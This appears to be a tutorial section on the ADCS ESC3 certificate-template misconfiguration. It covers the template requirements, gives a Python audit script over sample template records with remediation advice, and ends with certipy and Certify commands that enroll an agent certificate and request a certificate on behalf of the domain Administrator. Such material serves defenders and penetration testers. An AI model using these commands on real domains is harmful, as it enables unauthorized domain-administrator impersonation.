ESC3

Unlike ESC1 and ESC2, this method requires two certificate templates that meet the following requirements:

  • First Template

    • Certificate Request Agent EKU

    • Manager approval turned off

  • Second Template

    • Client Authentication EKU

    • Application Policy Issuance Requirement with Authorized Signatures Required enabled and set to 1

    • Manager approval turned off

And, of course, a user with enrollment rights.

In the context of ADCS, the Application Policy defines additional constraints that must be met for a certificate to be issued from a template; with the Authorized Signatures Required attribute set to 1 (or TRUE), the issuance process must include an authorized signature, enforcing authorization and control over the issued certificate.
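The two-template condition above can be audited directly from the template objects in AD. The following Python is an added example, not the page's nor Certipy's or Certify's code; it runs the check over constructed template records modelled on the LDAP attributes (pKIExtendedKeyUsage, msPKI-Enrollment-Flag, msPKI-RA-Signature, msPKI-RA-Application-Policies) and deliberately ignores enrollment ACLs, which a real audit would read from nTSecurityDescriptor as well.

```python
# Added example (not Certipy's or Certify's code): audit certificate template
# records for the two-template ESC3 pattern described above. Records are
# constructed inline, modelled on the LDAP attributes of the templates under
# CN=Certificate Templates,CN=Public Key Services; enrollment ACLs
# (nTSecurityDescriptor) are not modelled and must be checked separately.
ENROLLMENT_AGENT_OID = "1.3.6.1.4.1.311.20.2.1"  # Certificate Request Agent EKU
ANY_PURPOSE_OID = "2.5.29.37.0"
CLIENT_AUTH_OIDS = {"1.3.6.1.5.5.7.3.2",       # Client Authentication
                    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
                    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
                    ANY_PURPOSE_OID}
CT_FLAG_PEND_ALL_REQUESTS = 0x2  # msPKI-Enrollment-Flag bit: manager approval

def manager_approval_off(t):
    return not (t.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS)

def is_enrollment_agent_template(t):
    """First template: issues Certificate Request Agent certs without approval."""
    ekus = t.get("pKIExtendedKeyUsage", [])
    agent_capable = not ekus or ENROLLMENT_AGENT_OID in ekus or ANY_PURPOSE_OID in ekus
    return agent_capable and manager_approval_off(t)

def is_esc3_target_template(t):
    """Second template: client auth EKU, one agent signature required, no approval."""
    ekus = t.get("pKIExtendedKeyUsage", [])
    return ((not ekus or bool(CLIENT_AUTH_OIDS & set(ekus)))
            and t.get("msPKI-RA-Signature", 0) == 1
            and ENROLLMENT_AGENT_OID in t.get("msPKI-RA-Application-Policies", [])
            and manager_approval_off(t))

def find_esc3_pairs(templates):
    """Return (agent template, target template) name pairs that together form ESC3."""
    agents = [t for t in templates if is_enrollment_agent_template(t)]
    targets = [t for t in templates if is_esc3_target_template(t)]
    return [(a["cn"], b["cn"]) for a in agents for b in targets]

# Constructed sample records; "User" has the signature requirement enabled as in the lab above.
SAMPLE_TEMPLATES = [
    {"cn": "ESC3", "pKIExtendedKeyUsage": [ENROLLMENT_AGENT_OID], "msPKI-Enrollment-Flag": 0x0},
    {"cn": "User", "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
     "msPKI-Enrollment-Flag": 0x29,  # other flags set, approval bit 0x2 clear
     "msPKI-RA-Signature": 1, "msPKI-RA-Application-Policies": [ENROLLMENT_AGENT_OID]},
    {"cn": "ApprovedAgent", "pKIExtendedKeyUsage": [ENROLLMENT_AGENT_OID], "msPKI-Enrollment-Flag": 0x2},
    {"cn": "WebServer", "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"], "msPKI-Enrollment-Flag": 0x0},
]

if __name__ == "__main__":
    for agent, target in find_esc3_pairs(SAMPLE_TEMPLATES):
        print(f"ESC3: '{agent}' can sign requests for '{target}'")
```

Turning manager approval on for either template (setting the 0x2 bit) or removing the agent signature requirement from the second template makes the pair disappear from the result, which is the remediation the check points at.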

To abuse ESC3 we first request a certificate from the vulnerable template; that certificate then lets us request any other template on behalf of any other user. We use the on-behalf-of flag together with a template that can be used for Client Authentication, such as the built-in User template.

certipy req -u otter -p 'SomethingSecure123!' -ca otter-CA -template ESC3 -upn Administrator
certipy req -u otter -p 'SomethingSecure123!' -ca otter-CA -template User -on-behalf-of 'domain\administrator' -pfx otter.pfx

As always, the same attack can be performed with Certify:

.\Certify.exe request /ca:dc.domain.com\otter-CA /template:ESC3
.\Certify.exe request /ca:dc.domain.com\otter-CA /template:User /onbehalfof:DOMAIN\Administrator /enrollcert:cert.pfx 
